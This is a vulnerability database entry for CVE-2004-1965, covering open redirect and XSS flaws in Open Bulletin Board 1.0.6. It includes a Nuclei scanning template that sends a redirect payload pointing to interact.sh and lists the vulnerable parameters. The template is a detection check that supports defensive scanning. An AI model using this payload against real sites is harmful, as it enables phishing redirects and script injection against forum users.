CVE-2004-1965: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS

日期: 2025-08-01 | 影响软件: Open Bulletin Board (OpenBB) | POC: 已公开

漏洞描述

Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.

PoC代码[已公开]

id: CVE-2004-1965

info:
  name: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS
  author: ctflearner
  severity: medium
  description: |
    Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.
  remediation: |
    Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.
  reference:
    - https://www.exploit-db.com/exploits/24055
    - https://nvd.nist.gov/vuln/detail/CVE-2004-1965
    - http://marc.info/?l=bugtraq&m=108301983206107&w=2
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966
    - https://github.com/POORVAJA-195/Nuclei-Analysis-main
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2004-1965
    cwe-id: NVD-CWE-Other
    epss-score: 0.00265
    epss-percentile: 0.49885
    cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openbb
    product: openbb
  tags: cve,cve2004,redirect,xss,openbb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4b0a00483046022100822507b6a809199d316760b6a77e7c8b5f3de3ad6ad9f9700309723792293644022100f52317ebc8c4e6d80accd9ed49a1960da8cdb5539bf827a6f077224f038d8111:922c64590222798bb761d5b6d8e72950

相关漏洞推荐